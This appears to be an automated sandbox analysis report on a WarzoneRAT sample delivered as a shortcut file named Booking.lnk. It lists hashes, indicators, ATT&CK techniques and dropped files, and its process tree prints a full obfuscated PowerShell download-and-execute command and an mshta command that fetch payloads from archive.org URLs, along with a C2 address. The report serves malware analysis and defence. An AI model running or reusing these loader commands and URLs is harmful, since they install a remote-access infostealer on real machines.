warzonerat | ab915bb1e45aba4cbbb762e4bac31510539b4a418d8466839bf6e4c1b40b87a2

General

Target

Booking.lnk
Size

1KB
MD5

c19da592366d6c173dee901add093e8e
SHA1

ddd038c49bee36557cd203b581948e98a5e787a1
SHA256

ab915bb1e45aba4cbbb762e4bac31510539b4a418d8466839bf6e4c1b40b87a2
SHA512

7d9c0d3aa4b8907598f3c0982b32cc35d9afb816de8e350aefac3993cfbcd0e2b3c84ce59d99b9de239b20a10179ea6db9370aa53c89b3c3a1e4c05db8bdd7b3

Score

10^/10

warzonerat infostealer persistence rat

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://ia801509.us.archive.org/29/items/enc-kkkkkkkkkkkooooooookkkkkkkkkkk-2435467568790/Enc_kkkkkkkkkkkooooooookkkkkkkkkkk_2435467568790.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://ia601504.us.archive.org/1/items/all-kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk/ALL_kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk.txt

Extracted

Family

warzonerat

C2

103.147.184.73:5719

Signatures

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/776-149-0x0000000000400000-0x000000000041D000-memory.dmp	warzonerat
behavioral2/memory/776-150-0x0000000000405738-mapping.dmp	warzonerat
behavioral2/memory/776-154-0x0000000000400000-0x000000000041D000-memory.dmp	warzonerat

Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

8 2484 mshta.exe
10 2484 mshta.exe
12 2484 mshta.exe
16 2260 powershell.exe
22 2260 powershell.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Loads dropped DLL 1 IoCs

Processes:

svchost.exe

pid process

1724 svchost.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2260 set thread context of 776 2260 powershell.exe aspnet_compiler.exe

flow	pid	process
8	2484	mshta.exe
10	2484	mshta.exe
12	2484	mshta.exe
16	2260	powershell.exe
22	2260	powershell.exe

pid	process
1724	svchost.exe

description	pid	process	target process
PID 2260 set thread context of 776	2260	powershell.exe	aspnet_compiler.exe

Drops file in Program Files directory 3 IoCs

Processes:

aspnet_compiler.exesvchost.exe

description	ioc	process
File created	C:\Program Files\Microsoft DN1\sqlmap.dll	aspnet_compiler.exe
File created	C:\Program Files\Microsoft DN1\rdpwrap.ini	aspnet_compiler.exe
File opened for modification	\??\c:\program files\microsoft dn1\rdpwrap.txt	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exesvchost.exe

pid process

2260 powershell.exe
2260 powershell.exe
2260 powershell.exe
1724 svchost.exe
1724 svchost.exe
1724 svchost.exe
1724 svchost.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

620
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeaspnet_compiler.exesvchost.exe

description pid process

Token: SeDebugPrivilege 2260 powershell.exe
Token: SeDebugPrivilege 776 aspnet_compiler.exe
Token: SeAuditPrivilege 1724 svchost.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

aspnet_compiler.exe

pid process

776 aspnet_compiler.exe

pid	process
2260	powershell.exe
2260	powershell.exe
2260	powershell.exe
1724	svchost.exe
1724	svchost.exe
1724	svchost.exe
1724	svchost.exe

pid	process
620

description	pid	process
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	776	aspnet_compiler.exe
Token: SeAuditPrivilege	1724	svchost.exe

pid	process
776	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.exemshta.exepowershell.exe

description	pid	process	target process
PID 652 wrote to memory of 2484	652	cmd.exe	mshta.exe
PID 652 wrote to memory of 2484	652	cmd.exe	mshta.exe
PID 2484 wrote to memory of 2260	2484	mshta.exe	powershell.exe
PID 2484 wrote to memory of 2260	2484	mshta.exe	powershell.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe
PID 2260 wrote to memory of 776	2260	powershell.exe	aspnet_compiler.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Booking.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "https://ia801509.us.archive.org/29/items/enc-kkkkkkkkkkkooooooookkkkkkkkkkk-2435467568790/Enc_kkkkkkkkkkkooooooookkkkkkkkkkk_2435467568790.txt"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601504.us.archive.org/1/items/all-kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk/ALL_kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:776

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:3592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\??\c:\program files\microsoft dn1\rdpwrap.ini
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\program files\microsoft dn1\sqlmap.dll
MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\Program Files\Microsoft DN1\sqlmap.dll
MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
memory/776-149-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/776-154-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/776-150-0x0000000000405738-mapping.dmp

Download
memory/2260-126-0x00000150816E0000-0x00000150816E2000-memory.dmp

Filesize
8KB

Download
memory/2260-148-0x00000150824B0000-0x00000150824BE000-memory.dmp

Filesize
56KB

Download
memory/2260-136-0x00000150816E6000-0x00000150816E8000-memory.dmp

Filesize
8KB

Download
memory/2260-130-0x00000150824E0000-0x00000150824E1000-memory.dmp

Filesize
4KB

Download
memory/2260-128-0x00000150816E3000-0x00000150816E5000-memory.dmp

Filesize
8KB

Download
memory/2260-125-0x0000015082330000-0x0000015082331000-memory.dmp

Filesize
4KB

Download
memory/2260-116-0x0000000000000000-mapping.dmp

Download
memory/2484-114-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads